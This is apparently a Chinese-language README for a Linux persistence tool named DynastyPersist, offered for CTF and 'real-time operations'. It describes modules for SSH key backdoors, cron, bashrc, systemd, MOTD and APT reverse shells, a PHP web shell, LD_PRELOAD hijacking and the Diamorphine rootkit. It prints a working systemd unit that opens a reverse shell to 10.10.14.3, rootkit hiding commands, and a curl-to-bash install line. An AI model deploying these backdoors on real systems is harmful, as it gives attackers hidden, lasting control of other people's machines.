
| 功能特性 | 描述 |
|---|---|
| SSH 密钥生成 | 自动生成 SSH 密钥,用于隐秘访问。 |
| 计划任务持久化 | 设置计划任务以实现定时持久化。 |
| 创建带 root 权限的自定义用户 | 创建一个拥有 root 权限的自定义用户。 |
| RCE 持久化 | 通过远程代码执行实现持久化。 |
| LKM/ Rootkit | 演示基于 Linux 内核模块 (LKM) 的 rootkit 持久化。 |
| Bashrc 持久化 | 修改用户特定的 shell 初始化文件以实现持久化(别名/反弹 shell)。 |
| 针对 root 的 Systemd 服务 | 设置一个 systemd 服务以实现 root 持久化。 |
| LD_PRELOAD 权限提升配置 | 配置 LD_PRELOAD 以进行权限提升。 |
| 后门化每日消息/头部 | 对系统消息显示进行后门化,实现隐秘访问。 |
| 修改现有 Systemd 服务 | 操纵现有 systemd 服务以实现持久化。 |
| 后门化 APT 命令 | 后门化 apt 命令,使其在执行时弹出一个 shell。 |
通过 ssh 密钥生成获得服务器的访问权限。此模块为每个用户创建一个 id_rsa 密钥,可用于反向访问。运行此模块后,攻击者可以通过 ssh 连接到服务器。
也可以手动使用 ssh-keygen 命令完成。但该模块能快速为每个用户创建私钥。
root@kali ~ ssh -i id_rsa [email protected]
1Linux 中的计划任务是按指定间隔自动运行的定时任务。
这是最有效的模块之一,涉及反弹 shell。此模块直接将反弹 shell 命令写入 /etc/crontab,将在您监听的端口上弹出一个 shell。
root@kali ~ nc -nvlp 9999
2ssh 登录该用户。root@kali ~ ssh [email protected]
3此模块附带一个托管在 web 根目录下的 php 脚本。脚本位于 /var/www/html/dynasty_rce/rce.php。此外,如果先运行了 LKM 模块,可以隐藏前缀 dynasty_rce。
访问 victim_ip:port/dynasty_rce/rce.php 将赋予您在 shell 中执行命令的能力。
模块编号:4
Diamorphine 的开源 LKM rootkit。模块位于 /var/tmp/.memory 临时目录。设置完成后,此目录将被删除。victim@ubuntu ~ kill -64 0 # 提权至 root 用户。
victim@ubuntu ~ mkdir dynasty_persist # 以 dynasty 开头的任何目录都将被隐藏。
victim@ubuntu ~ kill -31 <process> # 隐藏进程
victim@ubuntu ~ lsmod | grep -i diamorphine # 隐藏自身
victim@ubuntu ~ kill -63 0 # 使其出现在 lsmod 输出中
5find、cat 命令时,会弹出一个 shell。root@kali ~ nc -nvlp 9999
6在 systemd 中创建自定义服务以实现反向访问。
示例:
Description=Dynasty Persist
[Service]
ExecStart=sudo bash /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/9999 0>&1'
Restart=always
RestartSec=30
[Install]
WantedBy=default.target"
上述示例将作为一个服务创建。此方法高效且持久。
模块编号:7
LD_PRELOAD 是 Linux 中的一个环境变量,允许用户在其他库之前预加载共享库。利用 LD_PRELOAD 进行权限提升涉及加载恶意库以拦截和修改系统调用,从而可能获得提升的权限。该模块后门化了 find 和 wget 等命令。
模块编号:8
Linux 中的“每日消息”(MOTD) 是一个可自定义的文本,在用户登录时显示,提供系统信息或更新。通常存储在 /etc/motd 文件中,可由系统管理员修改。
此模块将 shell 写入 /etc/update-motd.d/00-header。通常在用户登录时触发。
模块编号:9
类似于模块 7,此模块修改现有服务以实现反向访问。
简单来说,它将服务中的 ExecStartPre 重写为反弹 shell 命令。
模块编号:10
"APT" 代表高级软件包工具,常用于基于 Debian 的系统,如 Ubuntu。文件将位于:/etc/apt/apt.conf.d/42backdoor
后门化 apt 命令,每当运行 apt 时,都会弹出一个 shell。
模块编号:11
当前最新版本(1.4)提供 2 种模式。
模式包括 console 和 ctf,它们被设计为以特定行为工作。
相比而言,console 模式比 ctf 模式提供更多功能和稳定性。
console 模式以常规设置进入工具,包含所有功能。这些功能将在脚本执行的本地主机上本地运行。专为实时操作中的持久化而设计。
前缀 use 后跟模块编号可用于运行任何选定的模块。例如:use 1
此外,界面已更新,键入 show payloads 时现在会显示模块/载荷。
最后,帮助/选项菜单也已修改,输入 show options 即可查看。
ctf 模式是一个额外功能,用于通过 SSH 登录已攻陷的服务器并获得持久化。此附加功能在 KoTH 或 Battlegrounds 中会很有帮助。此外,它将节省设置持久化所需的大量时间。
运行 console 中的大部分功能。
$ ./dynasty.sh <lhost> <lport> <mode>
$ ./dynasty.sh ctf
$ ./dynasty.sh 10.10.14.3 9999 console
通过 Git
$ git clone https://github.com/Trevohack/DynastyPersist
$ cd DynastyPersist/src
通过 Curl
$ curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash